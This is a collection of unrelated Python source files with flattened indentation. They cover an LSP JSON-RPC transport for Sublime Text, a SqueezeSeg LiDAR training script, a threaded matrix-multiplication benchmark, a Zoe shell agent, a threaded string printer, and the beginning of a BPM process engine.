from .typing import Dict, Any, Optional, IO, Protocol, Generic, List, Callable, Tuple, TypeVar, Union
from contextlib import closing
from functools import partial
from queue import Queue
import http
import json
import os
import shutil
import socket
import sublime
import subprocess
import threading
import time
import weakref
T = TypeVar('T')
T_contra = TypeVar('T_contra', contravariant=True)
class StopLoopError(Exception):
pass
class Transport(Generic[T]):
def send(self, payload: T) -> None:
raise NotImplementedError()
def close(self) -> None:
raise NotImplementedError()
class TransportCallbacks(Protocol[T_contra]):
def on_transport_close(self, exit_code: int, exception: Optional[Exception]) -> None:
...
def on_payload(self, payload: T_contra) -> None:
...
def on_stderr_message(self, message: str) -> None:
...
class AbstractProcessor(Generic[T]):
def write_data(self, writer: IO[bytes], data: T) -> None:
raise NotImplementedError()
def read_data(self, reader: IO[bytes]) -> Optional[T]:
raise NotImplementedError()
class JsonRpcProcessor(AbstractProcessor[Dict[str, Any]]):
def write_data(self, writer: IO[bytes], data: Dict[str, Any]) -> None:
body = self._encode(data)
writer.writelines(("Content-Length: {}\r\n\r\n".format(len(body)).encode('ascii'), body))
def read_data(self, reader: IO[bytes]) -> Optional[Dict[str, Any]]:
headers = http.client.parse_headers(reader) # type: ignore
try:
body = reader.read(int(headers.get("Content-Length")))
except TypeError:
# Expected error on process stopping. Stop the read loop.
raise StopLoopError()
try:
return self._decode(body)
except Exception as ex:
exception_log("JSON decode error", ex)
return None
@staticmethod
def _encode(data: Dict[str, Any]) -> bytes:
return json.dumps(
data,
ensure_ascii=False,
sort_keys=False,
check_circular=False,
separators=(',', ':')
).encode('utf-8')
@staticmethod
def _decode(message: bytes) -> Dict[str, Any]:
return json.loads(message.decode('utf-8'))
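# Wire format example: the payload {"id": 1} is serialized by _encode() as the
# compact JSON b'{"id":1}' (8 bytes) and written as
#     Content-Length: 8\r\n
#     \r\n
#     {"id":1}
# read_data() parses the header block back and JSON-decodes exactly
# Content-Length bytes of body.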
class ProcessTransport(Transport[T]):
def __init__(self, name: str, process: subprocess.Popen, socket: Optional[socket.socket], reader: IO[bytes],
writer: IO[bytes], stderr: Optional[IO[bytes]], processor: AbstractProcessor[T],
callback_object: TransportCallbacks[T]) -> None:
self._closed = False
self._process = process
self._socket = socket
self._reader = reader
self._writer = writer
self._stderr = stderr
self._processor = processor
self._reader_thread = threading.Thread(target=self._read_loop, name='{}-reader'.format(name))
self._writer_thread = threading.Thread(target=self._write_loop, name='{}-writer'.format(name))
self._stderr_thread = threading.Thread(target=self._stderr_loop, name='{}-stderr'.format(name))
self._callback_object = weakref.ref(callback_object)
self._send_queue = Queue(0) # type: Queue[Union[T, None]]
self._reader_thread.start()
self._writer_thread.start()
self._stderr_thread.start()
def send(self, payload: T) -> None:
self._send_queue.put_nowait(payload)
def close(self) -> None:
if not self._closed:
self._send_queue.put_nowait(None)
if self._socket:
self._socket.close()
self._closed = True
def _join_thread(self, t: threading.Thread) -> None:
if t.ident == threading.current_thread().ident:
return
try:
t.join(2)
except TimeoutError as ex:
exception_log("failed to join {} thread".format(t.name), ex)
def __del__(self) -> None:
self.close()
self._join_thread(self._writer_thread)
self._join_thread(self._reader_thread)
self._join_thread(self._stderr_thread)
def _read_loop(self) -> None:
try:
while self._reader:
payload = self._processor.read_data(self._reader)
if payload is None:
continue
def invoke(p: T) -> None:
callback_object = self._callback_object()
if callback_object:
callback_object.on_payload(p)
sublime.set_timeout_async(partial(invoke, payload))
except (AttributeError, BrokenPipeError, StopLoopError):
pass
except Exception as ex:
exception_log("Unexpected exception", ex)
self._send_queue.put_nowait(None)
def _end(self, exception: Optional[Exception]) -> None:
exit_code = 0
if not exception:
try:
# Allow the process to stop itself.
exit_code = self._process.wait(1)
except (AttributeError, ProcessLookupError, subprocess.TimeoutExpired):
pass
if self._process.poll() is None:
try:
# The process didn't stop itself. Terminate!
self._process.kill()
# still wait for the process to die, or zombie processes might be the result
# Ignore the exit code in this case, it's going to be something non-zero because we sent SIGKILL.
self._process.wait()
except (AttributeError, ProcessLookupError):
pass
except Exception as ex:
exception = ex # TODO: Old captured exception is overwritten
def invoke() -> None:
callback_object = self._callback_object()
if callback_object:
callback_object.on_transport_close(exit_code, exception)
sublime.set_timeout_async(invoke)
self.close()
def _write_loop(self) -> None:
exception = None # type: Optional[Exception]
try:
while self._writer:
d = self._send_queue.get()
if d is None:
break
self._processor.write_data(self._writer, d)
self._writer.flush()
except (BrokenPipeError, AttributeError):
pass
except Exception as ex:
exception = ex
self._end(exception)
def _stderr_loop(self) -> None:
try:
while self._stderr:
if self._closed:
# None message already posted, just return
return
message = self._stderr.readline().decode('utf-8', 'replace')
if message == '':
break
callback_object = self._callback_object()
if callback_object:
callback_object.on_stderr_message(message.rstrip())
else:
break
except (BrokenPipeError, AttributeError):
pass
except Exception as ex:
exception_log('unexpected exception type in stderr loop', ex)
self._send_queue.put_nowait(None)
# Can be a singleton since it doesn't hold any state.
json_rpc_processor = JsonRpcProcessor()
def create_transport(config: TransportConfig, cwd: Optional[str],
callback_object: TransportCallbacks) -> Transport[Dict[str, Any]]:
if config.tcp_port is not None:
assert config.tcp_port is not None
if config.tcp_port < 0:
stdout = subprocess.PIPE
else:
stdout = subprocess.DEVNULL
stdin = subprocess.DEVNULL
else:
stdout = subprocess.PIPE
stdin = subprocess.PIPE
startupinfo = _fixup_startup_args(config.command)
sock = None # type: Optional[socket.socket]
process = None # type: Optional[subprocess.Popen]
def start_subprocess() -> subprocess.Popen:
return _start_subprocess(config.command, stdin, stdout, subprocess.PIPE, startupinfo, config.env, cwd)
if config.listener_socket:
assert isinstance(config.tcp_port, int) and config.tcp_port > 0
process, sock, reader, writer = _await_tcp_connection(
config.name,
config.tcp_port,
config.listener_socket,
start_subprocess
)
else:
process = start_subprocess()
if config.tcp_port:
sock = _connect_tcp(config.tcp_port)
if sock is None:
raise RuntimeError("Failed to connect on port {}".format(config.tcp_port))
reader = sock.makefile('rwb') # type: ignore
writer = reader
else:
reader = process.stdout # type: ignore
writer = process.stdin # type: ignore
if not reader or not writer:
raise RuntimeError('Failed initializing transport: reader: {}, writer: {}'.format(reader, writer))
return ProcessTransport(config.name, process, sock, reader, writer, process.stderr, json_rpc_processor,
callback_object)
_subprocesses = weakref.WeakSet() # type: weakref.WeakSet[subprocess.Popen]
def kill_all_subprocesses() -> None:
global _subprocesses
subprocesses = list(_subprocesses)
for p in subprocesses:
try:
p.kill()
except Exception:
pass
for p in subprocesses:
try:
p.wait()
except Exception:
pass
def _fixup_startup_args(args: List[str]) -> Any:
startupinfo = None
if sublime.platform() == "windows":
startupinfo = subprocess.STARTUPINFO() # type: ignore
startupinfo.dwFlags |= subprocess.SW_HIDE | subprocess.STARTF_USESHOWWINDOW # type: ignore
executable_arg = args[0]
_, ext = os.path.splitext(executable_arg)
if len(ext) < 1:
path_to_executable = shutil.which(executable_arg)
# what extensions should we append so CreateProcess can find it?
# node has .cmd
# dart has .bat
# python has .exe wrappers - not needed
for extension in ['.cmd', '.bat']:
if path_to_executable and path_to_executable.lower().endswith(extension):
args[0] = executable_arg + extension
break
return startupinfo
def _start_subprocess(
args: List[str],
stdin: int,
stdout: int,
stderr: int,
startupinfo: Any,
env: Dict[str, str],
cwd: Optional[str]
) -> subprocess.Popen:
debug("starting {} in {}".format(args, cwd if cwd else os.getcwd()))
process = subprocess.Popen(
args=args,
stdin=stdin,
stdout=stdout,
stderr=stderr,
startupinfo=startupinfo,
env=env,
cwd=cwd)
_subprocesses.add(process)
return process
class _SubprocessData:
def __init__(self) -> None:
self.process = None # type: Optional[subprocess.Popen]
def _await_tcp_connection(
name: str,
tcp_port: int,
listener_socket: socket.socket,
subprocess_starter: Callable[[], subprocess.Popen]
) -> Tuple[subprocess.Popen, socket.socket, IO[bytes], IO[bytes]]:
# After we have accepted one client connection, we can close the listener socket.
with closing(listener_socket):
# We need to be able to start the process while also awaiting a client connection.
def start_in_background(d: _SubprocessData) -> None:
# Sleep for one second, because the listener socket needs to be in the "accept" state before starting the
# subprocess. This is hacky, and will get better when we can use asyncio.
time.sleep(1)
process = subprocess_starter()
d.process = process
data = _SubprocessData()
thread = threading.Thread(target=lambda: start_in_background(data))
thread.start()
# Await one client connection (blocking!)
sock, _ = listener_socket.accept()
thread.join()
reader = sock.makefile('rwb') # type: IO[bytes]
writer = reader
assert data.process
return data.process, sock, reader, writer
def _connect_tcp(port: int) -> Optional[socket.socket]:
start_time = time.time()
while time.time() - start_time < TCP_CONNECT_TIMEOUT:
try:
return socket.create_connection(('localhost', port))
except ConnectionRefusedError:
pass
return None
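# Summary note (added, not part of the original module): create_transport() above
# roughly picks the channel from the TransportConfig - plain stdio pipes when
# tcp_port is None, an outgoing TCP connection when tcp_port is set, or a
# connection accepted on config.listener_socket - and always wraps the resulting
# reader/writer pair in a ProcessTransport framed by the shared json_rpc_processor.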
|
train_E.py
|
# BSD 3-Clause License
#
# Copyright (c) 2019, FPAI
# Copyright (c) 2019, SeriouslyHAO
# Copyright (c) 2019, xcj2019
# Copyright (c) 2019, Leonfirst
#
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Train"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from datetime import datetime
import os.path
import sys
import time
import math
import numpy as np
from six.moves import xrange
import tensorflow as tf
import threading
from config import *
from imdb import kitti
from utils.util import *
from nets import *
FLAGS = tf.app.flags.FLAGS
tf.app.flags.DEFINE_string('dataset', 'KITTI',
"""Currently only support KITTI dataset.""")
tf.app.flags.DEFINE_string('data_path', '', """Root directory of data""")
tf.app.flags.DEFINE_string('image_set', 'train',
""" Can be train, trainval, val, or test""")
tf.app.flags.DEFINE_string('train_dir', '/tmp/bichen/logs/squeezeseg/train',
"""Directory where to write event logs """
"""and checkpoint.""")
tf.app.flags.DEFINE_integer('max_steps', 1000000,
"""Maximum number of batches to run.""")
tf.app.flags.DEFINE_string('net', 'squeezeSeg',
"""Neural net architecture. """)
tf.app.flags.DEFINE_string('pretrained_model_path', '',
"""Path to the pretrained model.""")
tf.app.flags.DEFINE_integer('summary_step', 50,
"""Number of steps to save summary.""")
tf.app.flags.DEFINE_integer('checkpoint_step', 1000,
"""Number of steps to save summary.""")
tf.app.flags.DEFINE_string('gpu', '0', """gpu id.""")
def train():
"""Train SqueezeSeg model"""
assert FLAGS.dataset == 'KITTI', \
'Currently only support KITTI dataset'
os.environ['CUDA_VISIBLE_DEVICES'] = FLAGS.gpu
with tf.Graph().as_default():
assert FLAGS.net == 'squeezeSeg', \
'Selected neural net architecture not supported: {}'.format(FLAGS.net)
if FLAGS.net == 'squeezeSeg':
mc = kitti_squeezeSeg_config()
mc.PRETRAINED_MODEL_PATH = FLAGS.pretrained_model_path
model = SqueezeSeg(mc)
imdb = kitti(FLAGS.image_set, FLAGS.data_path, mc)
# save model size, flops, activations by layers
with open(os.path.join(FLAGS.train_dir, 'model_metrics.txt'), 'w') as f:
f.write('Number of parameter by layer:\n')
count = 0
for c in model.model_size_counter:
f.write('\t{}: {}\n'.format(c[0], c[1]))
count += c[1]
f.write('\ttotal: {}\n'.format(count))
count = 0
f.write('\nActivation size by layer:\n')
for c in model.activation_counter:
f.write('\t{}: {}\n'.format(c[0], c[1]))
count += c[1]
f.write('\ttotal: {}\n'.format(count))
count = 0
f.write('\nNumber of flops by layer:\n')
for c in model.flop_counter:
f.write('\t{}: {}\n'.format(c[0], c[1]))
count += c[1]
f.write('\ttotal: {}\n'.format(count))
f.close()
print ('Model statistics saved to {}.'.format(
os.path.join(FLAGS.train_dir, 'model_metrics.txt')))
def enqueue(sess, coord):
with coord.stop_on_exception():
while not coord.should_stop():
# read batch input
lidar_per_batch, lidar_mask_per_batch, label_per_batch,\
weight_per_batch = imdb.read_batch()
feed_dict = {
model.ph_keep_prob: mc.KEEP_PROB,
model.ph_lidar_input: lidar_per_batch,
model.ph_lidar_mask: lidar_mask_per_batch,
model.ph_label: label_per_batch,
model.ph_loss_weight: weight_per_batch,
}
sess.run(model.enqueue_op, feed_dict=feed_dict)
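# Note (added): the enqueue() closure above is started further below in
# mc.NUM_ENQUEUE_THREAD background threads; they keep the model's input queue
# filled from imdb.read_batch() while the main loop consumes batches, and the
# coordinator is used to ask them to stop.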
saver = tf.train.Saver(tf.all_variables())
summary_op = tf.summary.merge_all()
init = tf.initialize_all_variables()
sess = tf.Session(config=tf.ConfigProto(allow_soft_placement=True))
sess.run(init)
summary_writer = tf.summary.FileWriter(FLAGS.train_dir, sess.graph)
coord = tf.train.Coordinator()
enq_threads = []
for _ in range(mc.NUM_ENQUEUE_THREAD):
eqth = threading.Thread(target=enqueue, args=[sess, coord])
eqth.start()
enq_threads.append(eqth)
run_options = tf.RunOptions(timeout_in_ms=60000)
try:
for step in xrange(FLAGS.max_steps):
start_time = time.time()
if step % FLAGS.summary_step == 0 or step == FLAGS.max_steps-1:
op_list = [
model.lidar_input, model.lidar_mask, model.label, model.train_op,
model.loss, model.pred_cls, summary_op
]
lidar_per_batch, lidar_mask_per_batch, label_per_batch, \
_, loss_value, pred_cls, summary_str = sess.run(op_list,
options=run_options)
label_image = visualize_seg(label_per_batch[:6, :, :], mc)
pred_image = visualize_seg(pred_cls[:6, :, :], mc)
# Run evaluation on the batch
ious, _, _, _ = evaluate_iou(
label_per_batch, pred_cls*np.squeeze(lidar_mask_per_batch),
mc.NUM_CLASS)
feed_dict = {}
# Assume that class-0 is the background class
for i in range(1, mc.NUM_CLASS):
feed_dict[model.iou_summary_placeholders[i]] = ious[i]
iou_summary_list = sess.run(model.iou_summary_ops[1:], feed_dict)
# Run visualization
viz_op_list = [model.show_label, model.show_depth_img, model.show_pred]
viz_summary_list = sess.run(
viz_op_list,
feed_dict={
model.depth_image_to_show: lidar_per_batch[:6, :, :, [4]],
model.label_to_show: label_image,
model.pred_image_to_show: pred_image,
}
)
# Add summaries
summary_writer.add_summary(summary_str, step)
for sum_str in iou_summary_list:
summary_writer.add_summary(sum_str, step)
for viz_sum in viz_summary_list:
summary_writer.add_summary(viz_sum, step)
# force tensorflow to synchronise summaries
summary_writer.flush()
else:
_, loss_value = sess.run(
[model.train_op, model.loss], options=run_options)
duration = time.time() - start_time
assert not np.isnan(loss_value), \
'Model diverged. Total loss: {}'.format(loss_value)
if step % 10 == 0:
num_images_per_step = mc.BATCH_SIZE
images_per_sec = num_images_per_step / duration
sec_per_batch = float(duration)
format_str = ('%s: step %d, loss = %.2f (%.1f images/sec; %.3f '
'sec/batch)')
print (format_str % (datetime.now(), step, loss_value,
images_per_sec, sec_per_batch))
sys.stdout.flush()
# Save the model checkpoint periodically.
if step % FLAGS.checkpoint_step == 0 or step == FLAGS.max_steps-1:
checkpoint_path = os.path.join(FLAGS.train_dir, 'model.ckpt')
saver.save(sess, checkpoint_path, global_step=step)
except Exception as e:
sys.exit()
# coord.request_stop(e)
# finally:
# coord.request_stop()
# sess.run(model.q.close(cancel_pending_enqueues=True))
# coord.join(enq_threads)
def main(argv=None): # pylint: disable=unused-argument
if tf.gfile.Exists(FLAGS.train_dir):
tf.gfile.DeleteRecursively(FLAGS.train_dir)
tf.gfile.MakeDirs(FLAGS.train_dir)
train()
if __name__ == '__main__':
tf.app.run()
|
Matrix_Multiplication.py
|
# -*- coding: utf-8 -*-
"""
Created on Wed Apr 19 16:44:37 2017
@author: Usman
"""
import random,time,numpy as np,threading
from matplotlib import pyplot as plt
def multiply(rows,columns,matrix,matrix2,matrix3):
for i in range(0,int(rows),1):
for j in range(0,int(columns),1):
value=0
for k in range(0,int(columns),1):
value+= matrix[i][k]*matrix2[k][j]
matrix3[i][j]=value
#print ("Sequential: ",matrix3)
def multiparalell(min_row_matA,max_row_matA,min_col_matB,max_col_matB,columns,lock,i,matrix,matrix2,matrix3):
lock.acquire() #Acquiring Lock
try:
#print ("Before Matrix: ",matrix3)
for i in range(min_row_matA,max_row_matA,1):
for j in range(0,columns,1):
value=0
for k in range(0,columns,1):
value+= matrix[i][k]*matrix2[k][j]
matrix3[i][j]=value
#print ("Paralell Matrix: ",matrix3)
finally:
lock.release()
def main():
rows=int(input("Input the dimensions for NxN matrix:"))
nthreads=4#input("Input the number of threads: ")
columns=rows
min_row_matA=0 #Variables used to divide matrix in the chunks
max_row_matA=0
min_col_matB=0
max_col_matB=0
threads=[]
step=int(rows)/int(nthreads) #deciding how far each thread should process the first matrix
lock=threading.Lock() #making a new lock object
final_chunk=int(step)*int(nthreads)
matrix = [[1 for i in range(int(rows))] for i in range(int(columns))] #declaring the matrices
matrix2 = [[1 for i in range(int(rows))] for i in range(int(columns))]
matrix3 = [[0 for i in range(int(rows))] for i in range(int(columns))]
#print (matrix)
#print (matrix2)
for i in range(0,int(rows),int(step)):
#print("Step: ",int(step))
if(i+int(step)<=rows and max_row_matA!=rows): #If number of threads are even
#print(max_row_matA)
min_row_matA=i #For VectorA - dividing it into parts
max_row_matA=i+int(step)
min_col_matB=i
max_col_matB=i+int(step)
#print("First IF Called")
if(rows%int(nthreads)!=0 and i+int(step)==final_chunk): #If the final chunk has been reached and some rows still remain
# print("Second IF Called") #Extend the number of rows for the last thread.
max_row_matA=max_row_matA+(rows-final_chunk)
max_col_matB=max_col_matB+(rows-final_chunk)
time.sleep(0.5)
start = time.clock()
#print("Thread: ",i,"(",min_row_matA,",",max_row_matA,")")
#print("Thread: ",i,"(",min_col_matB,",",max_col_matB,")")
t=threading.Thread(target=multiparalell,args=(int(min_row_matA),int(max_row_matA),int(min_col_matB),int(max_col_matB),columns,lock,i,matrix,matrix2,matrix3))
t.start()
threads.append(t)
for thr in threads: #wait for every worker thread to finish
thr.join()
end = time.clock()
#print("Paralell Matrix: ",matrix3)
#print ("Processing Time for Paralell Addition: ",round(end - start,4))
startSeq = time.clock()
multiply(rows,columns,matrix,matrix2,matrix3)
endSeq = time.clock()
print("Process Time for Sequential multiplication: ",round(endSeq-startSeq,4)) #Printing Parallell Time
print("Sequential Time - Paralell Time :",round((endSeq-startSeq)-(end-start),4)) #Printing Sequential Time
if((endSeq-startSeq)>(end-start)):
print("Paralell Mechanism was",round((((endSeq-startSeq))-((end-start)))/(end-start),4),"% Faster")
if((endSeq-startSeq)<(end-start)):
print("Sequential Mechanism was",round((((end-start))-((endSeq-startSeq)))/(endSeq-startSeq),4),"% Faster")
if((endSeq-startSeq)==(end-start)):
print("Sequential and Paralell were same")
x_axis=["Seq Mech Time","Par Mech Time"]
y_axis=[round((endSeq-startSeq),4),round((end-start),4)]
ind=np.arange(len(x_axis))
print("Graph shows the times for Paralell and Sequential Mechanisms")
plt.bar(ind,y_axis)
plt.xticks(ind,x_axis)
if __name__ == "__main__":
main()
|
agent.py
|
# -*- coding: utf-8 -*-
#
# This file is part of Zoe Assistant
# Licensed under MIT license - see LICENSE file
#
from zoe import *
from colors import green, yellow
import threading
import logging
import json
import cmd
import sys
import os
def show(what):
return {
'intent': 'shell.show',
'payloads': [ what ]
}
def i(i):
return {
'data': 'integer',
'value': i
}
def s(s):
return {
'data': 'string',
'value': s
}
def user(name):
return {
'intent': 'user.get',
'name': name
}
def email(user, subject, text):
return {
'intent': 'mail.send',
'recipient': user,
'subject': subject,
'body': text
}
@Agent('Shell')
class ZoeShell(cmd.Cmd):
prompt = ''
def __init__(self):
super().__init__()
if not sys.stdout.isatty():
print('You are running this agent non interactively, which is not the idea :)')
print('If you are running it with docker-compose, try:')
print('\n docker-compose run zoe-agent-shell')
sys.exit(1)
self._thread = threading.Thread(target = self.cli, daemon = True)
self._thread.start()
@Intent('shell.show')
def receive(self, msg):
print(green(str(msg['payloads'])))
def cli(self):
print('Welcome to the Zoe shell!')
print('You can send Zoe commands like', green("email(user('someone'), 'subject', 'body')"))
print('This shell will translate those commands to the Zoe language and show the results when')
print('they are available.')
print(yellow('Please note that due to Kafka rebalancing, the first commands'))
print(yellow('can take a few seconds to be dispatched.'))
self.cmdloop()
def emptyline(self):
pass
def default(self, line):
try:
result = eval(line)
self.send(show(result))
except:
print('Error:', sys.exc_info())
|
main.py
|
#!/usr/bin/env python3
from argparse import ArgumentDefaultsHelpFormatter, ArgumentParser, FileType
from threading import Thread, Event
from queue import Empty, Queue
from lib.pastlylogger import PastlyLogger
from lib.worker import Worker
from lib.datamanager import DataManager
import time, sys
def fail_hard(*msg):
if msg: print(*msg, file=sys.stderr)
exit(1)
class WorkerFeeder():
def __init__(self, args, log, dm, end_event, name):
self._args, self._dm = args, dm
self._end_event = end_event
self._name = name
self.input = Queue(maxsize=1)
self.thread = Thread(target=self._enter)
self.thread.name = self._name
self.thread.start()
def wait(self):
assert self.thread != None
self.thread.join()
def _enter(self):
log('Starting WorkerFeeder',self._name)
self._worker = Worker(self._args, log, self._dm)
while not self.input.empty() or not self._end_event.is_set():
item = None
try: item = self.input.get(timeout=0.01)
except Empty: continue
if item:
direction, item = item
if direction == 'enc':
self._worker.process_enc(*item)
else:
self._worker.process_clear(*item)
log('Ending WorkerFeeder',self._name)
# block until one of the threads is available to take work, and return it
def get_next_worker_thread(threads):
while True:
for thr in threads:
if not thr.input.full():
return thr
time.sleep(0.01)
def wait_for_threads(threads):
for thr in threads:
while not thr.input.empty():
time.sleep(0.01)
def main(args):
global log
if args.debug:
log = PastlyLogger(info='/dev/stderr', overwrite=['info'],
log_threads=True)
else:
log = PastlyLogger(info='/dev/null', overwrite=['info'],
log_threads=True)
kill_worker_threads = Event()
kill_data_manager_thread = Event()
dm = DataManager(args, log, kill_data_manager_thread)
workers = [ WorkerFeeder(args, log, dm, kill_worker_threads,
'Worker-{}'.format(i)) for i in range(0, args.threads) ]
for enc in args.encrypted:
dm.init_data(l=len(enc))
for idx, char in enumerate(enc):
thr = get_next_worker_thread(workers)
thr.input.put( ('enc',(idx, char)) )
wait_for_threads(workers)
dm.print_data(times=args.times)
for clear in args.clear:
dm.init_data(l=len(clear))
for idx, char in enumerate(clear):
thr = get_next_worker_thread(workers)
thr.input.put( ('clear',(idx, char)) )
wait_for_threads(workers)
dm.print_data(times=args.times)
wait_for_threads(workers)
kill_worker_threads.set()
for thr in workers: thr.wait()
kill_data_manager_thread.set()
if __name__=='__main__':
DEF_ENC = ['Uryy1MQn6nMN0ny@6vp5M{Mc@6u10']
DEF_CLEAR = []
ALPHA, NUM = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ', '0123456789',
ALPHA += ALPHA.lower()
SPECIAL = '!@#$%^&*()_-+=\|]}[{\'";:/?.>,< '
parser = ArgumentParser(
formatter_class=ArgumentDefaultsHelpFormatter)
parser.add_argument('-r','--times', metavar='NUM', type=int,
help='Number of times to repeat phrases', default=10)
parser.add_argument('-t','--threads', metavar='NUM', type=int,
help='Number of worker threads', default=8)
parser.add_argument('--debug', action='store_true',
help='Debug development')
parser.add_argument('-e','--encrypted', metavar='STR', type=str,
help='An encrypted string to decrypt and securely print',
action='append', default=DEF_ENC)
parser.add_argument('-c','--clear', metavar='STR', type=str,
help='A plain-text string to securely print',
action='append', default=DEF_CLEAR)
parser.add_argument('-d','--dictionary', metavar='STR', type=str,
help='A list of all possible characters',
default=ALPHA+NUM+SPECIAL)
args = parser.parse_args()
if args.encrypted != DEF_ENC or args.clear != DEF_CLEAR:
args.encrypted = args.encrypted[len(DEF_ENC):]
args.clear = args.clear[len(DEF_CLEAR):]
args.dictionary = [ c for c in args.dictionary ]
if args.threads < 1: fail_hard('Don\'t be stupid')
if args.times < 1: fail_hard('Don\'t be stupid')
exit(main(args))
|
core.py
|
from py_expression.core import Exp
from .base import *
import uuid
import threading
from multiprocessing import Process as ParallelProcess, process
class ProcessError(Exception):pass
class Object(object):pass
class ProcessSpec(object):pass
class Token(object):pass
"""
For the Python implementation a dictionary is used as the token store,
but for the Go implementation REDIS should be used instead.
"""
class TokenManager():
def __init__(self):
self._list={}
def create(self,process,parent=None,node=None,status='running')->Token:
token = Token()
token.id= str(uuid.uuid4())
token.process = process
token.mainId = parent.mainId if parent is not None else token.id
token.parentId = parent.id if parent is not None else None
token.status= status
token.node = node
token.childs = []
return self.set(token)
def set(self,token:Token):
self._list[token.id] = token
return token
def get(self,key:str)-> Token:
return self._list[key]
def getChilds(self,parentId):
parent = self.get(parentId)
list = []
for childId in parent.childs:
list.append(self.get(childId))
return list
def update(self,token,data:dict):
for p in data:
setattr(token, p,data[p])
return self.set(token)
def delete(self,id:str):
del self._list[id]
def deleteChilds(self,parent):
for childId in parent.childs:
self.delete(childId)
parent.childs = []
return self.set(parent)
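# Illustrative usage sketch (added; the 'invoice' process name is hypothetical):
#   tm = TokenManager()
#   root = tm.create(process='invoice', node='start')
#   tm.update(root, {'status': 'await'})   # mutate and re-store the token
#   tm.get(root.id)                        # -> the same token instance
#   tm.delete(root.id)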
class ProcessParser():
def __init__(self,exp):
self.exp = exp
class BpmParser(ProcessParser):
def __init__(self,exp):
super(BpmParser,self).__init__(exp)
def parse(self,spec:dict)-> ProcessSpec:
process = ProcessSpec()
process.name= spec['name']
process.kind= spec['kind']
# TODO: the bind should be defined in the view rather than in the process; resolving this is still pending
process.bind = spec['bind'] if 'bind' in spec else []
process.input=self.parseInput(spec)
process.declare=self.parseDeclare(spec)
process.init=self.parseInit(spec)
process.vars=self.getVars(process)
process.nodes = {}
for key in spec['nodes']:
specNode=spec['nodes'][key]
specNode['name']=key
process.nodes[key] =self.parseNode(specNode)
for key in process.nodes:
node=process.nodes[key]
node.entries= self.getEntries(key,process.nodes)
return process
def parseInput(self,spec:dict):
input = []
if 'input' in spec:
for p in spec['input']:
param = Object()
param.name = p
param.type = spec['input'][p]
input.append(param)
return input
def parseDeclare(self,spec:dict):
declare = []
if 'declare' in spec:
for p in spec['declare']:
param = Object()
param.name = p
param.type = spec['declare'][p]
declare.append(param)
return declare
def parseInit(self,spec:dict):
init = Object()
if 'init' in spec:
init.expression = self.exp.parse(spec['init']['exp'])
else:
init.expression = None
return init
def getVars(self,process:ProcessSpec):
vars={}
for p in process.input:
var = Object()
var.type=p.type
var.bind = True if p.name in process.bind else False
vars[p.name]=var
for p in process.declare:
var = Object()
var.type=p.type
var.bind = True if p.name in process.bind else False
vars[p.name]=var
return vars
def getEntries(self,key,nodes):
list = []
for name in nodes:
node=nodes[name]
for t in node.transition:
if t.target == key:
s = Object()
s.source= node
s.transition = t
list.append(s)
return list
def parseNode(self,spec):
kind=spec['kind']
if kind == 'start':return self.parseNodeStart(spec)
elif kind == 'end':return self.parseNodeDefault(Object(),spec)
elif kind == 'task':return self.parseNodeTask(spec)
elif kind == 'exclusiveGateway':return self.parseNodeGateway(spec)
elif kind == 'inclusiveGateway':return self.parseNodeGateway(spec)
elif kind == 'parallelGateway':return self.parseNodeGateway(spec)
else: raise ProcessError('not found node kind :'+kind)
def parseNodeStart(self,spec):
node= self.parseNodeDefault(Object(),spec)
node.expression = self.exp.parse(spec['exp']) if 'exp' in spec else None
return node
def parseNodeTask(self,spec):
node= self.parseNodeDefault(Object(),spec)
node.expression= self.exp.parse(spec['exp']) if 'exp' in spec else None
return node
def parseNodeGateway(self,spec):
node= self.parseNodeDefault(Object(),spec)
node.key = spec['key'] if 'key' in spec else 'default'
return node
# TODO
def parseNodeScript(self,spec):pass
# TODO
def parseNodeEventGateway(self,spec):pass
# TODO
def parseNodeSubProcess(self,spec):pass
# TODO
def parseNodeUserTask(self,spec):pass
# TODO
def parseNodeServiceTask(self,spec):pass
# TODO
def parseNodeEventSignal(self,spec):pass
# TODO
def parseNodeStartSignal(self,spec):pass
# TODO
def parseNodeRaiseSignal(self,spec):pass
def parseNodeDefault(self,node,spec):
node.name = spec['name']
node.kind = spec['kind']
node.transition = self.parseTransition(spec)
return node
def parseTransition(self,spec):
transition = []
if 'transition' in spec:
for p in spec['transition']:
item = Object()
item.target = p['target']
item.expression = self.exp.parse(p['exp']) if 'exp' in p else None
transition.append(item)
return transition
class ProcessInstance:
def __init__(self,parent:str,spec:ProcessSpec,context:dict,tokenManager:TokenManager,exp:Exp):
self._id=None
self._parent=parent
self._context=context
self._status='ready'
self._spec=spec
self.tokenManager=tokenManager
self.exp = exp
self.init()
@property
def id(self):
return self._id
@id.setter
def id(self,value):
self._id=value
@property
def parent(self):
return self._parent
@property
def spec(self):
return self._spec
@property
def context(self):
return self._context
def init(self):
if self._spec.init.expression != None:
self.exp.eval(self._spec.init.expression,self._context)
class BpmInstance(ProcessInstance):
def __init__(self,parent:str,spec:ProcessSpec,context:dict,tokenManager:TokenManager,exp:Exp):
